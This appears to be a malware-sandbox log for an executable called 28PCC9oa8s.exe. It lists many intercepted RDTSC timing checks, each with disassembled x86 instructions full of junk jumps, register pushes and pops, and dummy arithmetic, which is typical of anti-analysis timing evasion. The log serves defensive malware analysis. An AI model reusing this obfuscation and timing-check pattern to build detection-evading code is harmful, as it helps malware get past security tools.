Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0604 second address: 6DD065B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F98351AAB28h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+08h], eax 0x00000010 jmp 00007F98351AAB20h 0x00000015 mov dword ptr [esi+0Ch], eax 0x00000018 jmp 00007F98351AAB20h 0x0000001d mov eax, dword ptr [ebx+4Ch] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F98351AAB1Ah 0x00000029 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD065B second address: 6DD066A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD07E5 second address: 6DD07E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD07E9 second address: 6DD07ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD07ED second address: 6DD07F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD07F3 second address: 6DD0850 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9834D75052h 0x00000009 add esi, 688E4EC8h 0x0000000f jmp 00007F9834D7504Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F9834D75058h 0x0000001b and cx, D128h 0x00000020 jmp 00007F9834D7504Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov eax, dword ptr [ebx+5Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0850 second address: 6DD0856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0856 second address: 6DD085B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD085B second address: 6DD08C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F98351AAB1Eh 0x00000013 adc esi, 35935EB8h 0x00000019 jmp 00007F98351AAB1Bh 0x0000001e popfd 0x0000001f call 00007F98351AAB28h 0x00000024 push ecx 0x00000025 pop edi 0x00000026 pop ecx 0x00000027 popad 0x00000028 mov eax, dword ptr [ebx+60h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F98351AAB28h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD08C9 second address: 6DD097E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9834D75054h 0x00000013 or eax, 3FE51DD8h 0x00000019 jmp 00007F9834D7504Bh 0x0000001e popfd 0x0000001f mov dh, cl 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+64h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F9834D75051h 0x0000002c sub ch, 00000076h 0x0000002f jmp 00007F9834D75051h 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007F9834D75050h 0x0000003b sbb ax, 6298h 0x00000040 jmp 00007F9834D7504Bh 0x00000045 popfd 0x00000046 popad 0x00000047 mov dword ptr [esi+28h], eax 0x0000004a jmp 00007F9834D75056h 0x0000004f mov eax, dword ptr [ebx+68h] 0x00000052 pushad 0x00000053 mov bx, ax 0x00000056 popad 0x00000057 mov dword ptr [esi+2Ch], eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD097E second address: 6DD0982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0982 second address: 6DD0993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0993 second address: 6DD09D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F98351AAB1Dh 0x0000000b adc eax, 1D936446h 0x00000011 jmp 00007F98351AAB21h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ax, word ptr [ebx+6Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F98351AAB1Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD09D4 second address: 6DD0A25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bx, E02Eh 0x00000014 pushfd 0x00000015 jmp 00007F9834D7504Fh 0x0000001a sub esi, 67CCB0DEh 0x00000020 jmp 00007F9834D75059h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0A25 second address: 6DD0A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0A2B second address: 6DD0A8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f pushad 0x00000010 mov dl, B0h 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 mov word ptr [esi+32h], ax 0x0000001a pushad 0x0000001b pushad 0x0000001c mov edx, 3D500008h 0x00000021 push ebx 0x00000022 pop eax 0x00000023 popad 0x00000024 mov ax, di 0x00000027 popad 0x00000028 mov eax, dword ptr [ebx+0000008Ch] 0x0000002e jmp 00007F9834D7504Fh 0x00000033 mov dword ptr [esi+34h], eax 0x00000036 jmp 00007F9834D75056h 0x0000003b mov eax, dword ptr [ebx+18h] 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0A8A second address: 6DD0A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0A8E second address: 6DD0AAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0AAB second address: 6DD0AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0AB0 second address: 6DD0AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F9834D7504Dh 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+38h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9834D75059h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0AE5 second address: 6DD0AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0AEB second address: 6DD0B48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+1Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F9834D75050h 0x00000015 and eax, 6E538BE8h 0x0000001b jmp 00007F9834D7504Bh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F9834D75056h 0x00000029 xor esi, 1EE31E48h 0x0000002f jmp 00007F9834D7504Bh 0x00000034 popfd 0x00000035 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0B48 second address: 6DD0B70 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+3Ch], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F98351AAB27h 0x00000012 movzx ecx, di 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0B70 second address: 6DD0BC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75052h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+20h] 0x0000000c jmp 00007F9834D75050h 0x00000011 mov dword ptr [esi+40h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F9834D7504Dh 0x0000001d sbb esi, 3D7E4E26h 0x00000023 jmp 00007F9834D75051h 0x00000028 popfd 0x00000029 mov bl, ch 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0BC8 second address: 6DD0C38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F98351AAB24h 0x00000009 jmp 00007F98351AAB25h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 lea eax, dword ptr [ebx+00000080h] 0x00000018 jmp 00007F98351AAB1Eh 0x0000001d push 00000001h 0x0000001f jmp 00007F98351AAB20h 0x00000024 nop 0x00000025 pushad 0x00000026 pushad 0x00000027 jmp 00007F98351AAB1Ch 0x0000002c mov ah, D9h 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 mov edx, 4910A5D0h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0C38 second address: 6DD0C8F instructions: 0x00000000 rdtsc 0x00000002 call 00007F9834D75059h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, bx 0x00000012 pushfd 0x00000013 jmp 00007F9834D7504Fh 0x00000018 or ecx, 508786DEh 0x0000001e jmp 00007F9834D75059h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0C8F second address: 6DD0CA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push edi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0CA2 second address: 6DD0D45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9834D7504Fh 0x00000009 or ecx, 540E419Eh 0x0000000f jmp 00007F9834D75059h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F9834D75050h 0x0000001b adc esi, 27B61B98h 0x00000021 jmp 00007F9834D7504Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a lea eax, dword ptr [ebp-10h] 0x0000002d pushad 0x0000002e mov edi, 1BB2E286h 0x00000033 popad 0x00000034 push esp 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F9834D75058h 0x0000003c add ah, 00000028h 0x0000003f jmp 00007F9834D7504Bh 0x00000044 popfd 0x00000045 pushad 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 popad 0x0000004a mov dword ptr [esp], eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F9834D7504Ch 0x00000054 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0D45 second address: 6DD0D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98351AAB1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0DD7 second address: 6DD0DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0DDD second address: 6DD0E54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c pushad 0x0000000d mov ax, 484Dh 0x00000011 call 00007F98351AAB1Ah 0x00000016 mov si, 0B81h 0x0000001a pop ecx 0x0000001b popad 0x0000001c mov dword ptr [esi+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 call 00007F98351AAB26h 0x00000027 pop ecx 0x00000028 pushfd 0x00000029 jmp 00007F98351AAB1Bh 0x0000002e sbb ah, 0000005Eh 0x00000031 jmp 00007F98351AAB29h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0E54 second address: 6DD0E5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0E5A second address: 6DD0EA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e jmp 00007F98351AAB26h 0x00000013 push 00000001h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 call 00007F98351AAB1Dh 0x0000001d pop ecx 0x0000001e mov edx, 4D5B8794h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0EA5 second address: 6DD0ED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebp 0x0000000a pushad 0x0000000b mov al, 83h 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F9834D75052h 0x00000016 lea eax, dword ptr [ebp-08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0ED0 second address: 6DD0ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0ED7 second address: 6DD0EF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0EF5 second address: 6DD0EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0EFC second address: 6DD0F4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75056h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F9834D75051h 0x00000010 pushfd 0x00000011 jmp 00007F9834D75050h 0x00000016 adc cx, 4198h 0x0000001b jmp 00007F9834D7504Bh 0x00000020 popfd 0x00000021 pop esi 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0FA7 second address: 6DD0FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0FAB second address: 6DD0FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0FB1 second address: 6DD105D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 pushfd 0x00000006 jmp 00007F98351AAB1Eh 0x0000000b xor ah, FFFFFFE8h 0x0000000e jmp 00007F98351AAB1Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test edi, edi 0x00000019 jmp 00007F98351AAB26h 0x0000001e js 00007F98A55991E0h 0x00000024 jmp 00007F98351AAB20h 0x00000029 mov eax, dword ptr [ebp-04h] 0x0000002c jmp 00007F98351AAB20h 0x00000031 mov dword ptr [esi+08h], eax 0x00000034 jmp 00007F98351AAB20h 0x00000039 lea eax, dword ptr [ebx+70h] 0x0000003c jmp 00007F98351AAB20h 0x00000041 push 00000001h 0x00000043 pushad 0x00000044 jmp 00007F98351AAB1Eh 0x00000049 mov ax, 2A11h 0x0000004d popad 0x0000004e nop 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 mov esi, ebx 0x00000054 push ebx 0x00000055 pop esi 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD112A second address: 6DD119D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, C9A7h 0x00000007 pushfd 0x00000008 jmp 00007F9834D7504Ch 0x0000000d adc eax, 3E7022D8h 0x00000013 jmp 00007F9834D7504Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c test edi, edi 0x0000001e jmp 00007F9834D75056h 0x00000023 js 00007F98A516358Ah 0x00000029 jmp 00007F9834D75050h 0x0000002e mov eax, dword ptr [ebp-14h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F9834D75057h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD119D second address: 6DD11A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD11A3 second address: 6DD120C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9834D7504Dh 0x00000011 sub ch, 00000036h 0x00000014 jmp 00007F9834D75051h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F9834D75050h 0x00000020 sub ch, 00000058h 0x00000023 jmp 00007F9834D7504Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov dword ptr [esi+0Ch], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F9834D75055h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD120C second address: 6DD1245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 9D82h 0x00000007 call 00007F98351AAB23h 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov edx, 772406ECh 0x00000015 jmp 00007F98351AAB1Fh 0x0000001a sub eax, eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1245 second address: 6DD1249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1249 second address: 6DD12C4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F98351AAB21h 0x00000008 xor eax, 76488AB6h 0x0000000e jmp 00007F98351AAB21h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ebx, eax 0x00000018 popad 0x00000019 lock cmpxchg dword ptr [edx], ecx 0x0000001d jmp 00007F98351AAB1Ah 0x00000022 pop edi 0x00000023 jmp 00007F98351AAB20h 0x00000028 test eax, eax 0x0000002a jmp 00007F98351AAB20h 0x0000002f jne 00007F98A5598F47h 0x00000035 pushad 0x00000036 mov dl, cl 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b pop esi 0x0000003c popad 0x0000003d mov edx, dword ptr [ebp+08h] 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 push esi 0x00000046 pop edx 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD12C4 second address: 6DD12CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD12CA second address: 6DD12EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98351AAB28h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD12EE second address: 6DD1354 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b jmp 00007F9834D75056h 0x00000010 mov eax, dword ptr [esi+04h] 0x00000013 pushad 0x00000014 mov edx, ecx 0x00000016 call 00007F9834D7504Ah 0x0000001b pushfd 0x0000001c jmp 00007F9834D75052h 0x00000021 sub ax, 09B8h 0x00000026 jmp 00007F9834D7504Bh 0x0000002b popfd 0x0000002c pop ecx 0x0000002d popad 0x0000002e mov dword ptr [edx+04h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1354 second address: 6DD1358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1358 second address: 6DD135C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD135C second address: 6DD1362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1362 second address: 6DD137C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9834D75056h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD137C second address: 6DD13F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b pushad 0x0000000c mov ebx, 7D225360h 0x00000011 jmp 00007F98351AAB29h 0x00000016 popad 0x00000017 mov dword ptr [edx+08h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F98351AAB23h 0x00000023 adc eax, 06D7C2EEh 0x00000029 jmp 00007F98351AAB29h 0x0000002e popfd 0x0000002f call 00007F98351AAB20h 0x00000034 pop esi 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD13F3 second address: 6DD13F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1507 second address: 6DD155D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, FE5Ah 0x00000008 popad 0x00000009 mov dword ptr [edx+24h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F98351AAB1Dh 0x00000013 pushfd 0x00000014 jmp 00007F98351AAB20h 0x00000019 xor cx, DFC8h 0x0000001e jmp 00007F98351AAB1Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ax, F13Fh 0x00000029 popad 0x0000002a mov eax, dword ptr [esi+28h] 0x0000002d pushad 0x0000002e mov eax, 2D6EC937h 0x00000033 popad 0x00000034 mov dword ptr [edx+28h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD155D second address: 6DD1561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1561 second address: 6DD1573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD1573 second address: 6DD1579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
